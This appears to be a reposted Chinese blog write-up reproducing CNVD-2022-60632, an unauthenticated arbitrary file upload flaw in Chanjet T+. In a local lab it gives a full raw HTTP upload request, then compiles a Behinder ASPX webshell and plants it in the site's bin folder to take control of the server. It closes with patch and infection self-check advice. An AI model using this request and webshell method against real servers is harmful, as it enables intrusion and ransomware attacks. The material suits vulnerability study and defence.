畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

渗透技巧 2年前 (2022) admin
2,110 0 0

漏洞简介

2022年8月29日和8月30日,畅捷通公司紧急发布安全补丁修复了畅捷通T+软件任意文件上传漏洞。未经身份认证的攻击者利用该漏洞,通过绕过系统鉴权,在特定配置环境下实现任意文件的上传,从而执行任意代码,获得服务器控制权限。目前,已有用户被不法分子利用该漏洞进行勒索病毒攻击的情况出现。


影响版本

畅捷通T+单机版<=17.0且使用IIS10.0以下版本

环境搭建

产品安装包下载地址

https://dad.chanapp.chanjet.com/TplusYZHJ17.0.zip

下载后解压如下

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

首先进入CheckEnvironment目录中,执行T+环境检测程序,进行安装前的环境检测

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

经检测,服务器环境符合要求

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

接下来回到T+云主机17.0目录下,执行Setup程序

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

选择标准版进行安装,由于本机没有安装SQL Server数据库,因此在配置数据库时不进行配置即可,安装完成后,访问http://localhost/tplus/view/login.html,显示如下则说明环境已经搭建成功

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

漏洞复现

构造漏洞利用POC,发送该请求至服务器

GET /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1Host: 10.211.55.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: ASP.NET_SessionId=gvigofzulthd2v1i2q5zndtf; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1662302093; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1662302093Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywwk2ReqGTj7lNYltContent-Length: 181------WebKitFormBoundarywwk2ReqGTj7lNYltContent-Disposition: form-data; name="File1";filename="222.aspx"Content-Type: image/jpeg1------WebKitFormBoundarywwk2ReqGTj7lNYlt--

执行结果如下图所示

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

该请求包,可将文件名为222.aspx 的文件上传到远程服务器上,检查服务器上的目录,可以看到该文件已经成功上传。

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

接下来我们使用冰蝎自带的Webshell,通过预编译后,上传到服务器,从而获取到目标服务器的控制权限。

首先在Windows系统中对WebShell进行编译,木马文件为shell.aspx,位于C:UserssojrsDesktopshell,执行命令如下

C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_compiler.exe -v / -p C:UserssojrsDesktopshell C:UserssojrsDesktopshell_compiled -fixednames
畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

执行完成之后,编译后的文件会保存在C:UserssojrsDesktopshell_compiled目录

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

接下来我们将shell.aspx、App_Web_shell.aspx.cdcab7d2.dll、shell.aspx.cdcab7d2.compiled上传到畅捷通的网站根目录的bin文件夹下,注意在filename参数处填写待保存的文件位置。

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)
畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)
畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

上传成功

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

最后配置冰蝎的连接,可以看到成功连接

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)


漏洞修复

目前,畅捷通公司已紧急发布漏洞补丁修复该漏洞,CNVD建议受影响的单位和用户立即升级至最新版本:https://www.chanjetvip.com/product/goods

同时,请受漏洞影响的单位和用户立即按照以下步骤开展自查和修复工作:

1、用户自查步骤:

查询本地是否存在

website/bin/load.aspx.cdcab7d2.compiled、website/bin/App_Web_load.aspx.cdcab7d2.dll、tplus/Load.aspx文件,如存在说明已经中毒,须重装系统,并安装产品打补丁。

2、未中毒用户请:

更新最新产品补丁。

安装杀毒软件,并及时升级病毒库。

升级IIS和Nginx版本至IIS10.0和Windows 2016。

本地安装客户需尽快确认备份文件是否完整,以及做了异地备份。云上客户请及时开启镜像功能。

未能及时更新补丁的用户,可联系畅捷通技术支持,采取删除文件等临时防范措施。

3、已中毒用户请:

检查服务器是否有做定期快照或备份,如有可通过快照或备份恢复数据。

联系畅捷通技术支持,确认是否具备从备份文件恢复数据的条件及操作方法。

畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)


畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

原文始发于微信公众号(第59号):畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632)

版权声明:admin 发表于 2022年12月9日 上午8:30。
转载请注明:畅捷通T+任意文件上传漏洞复现(CNVD-2022-60632) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...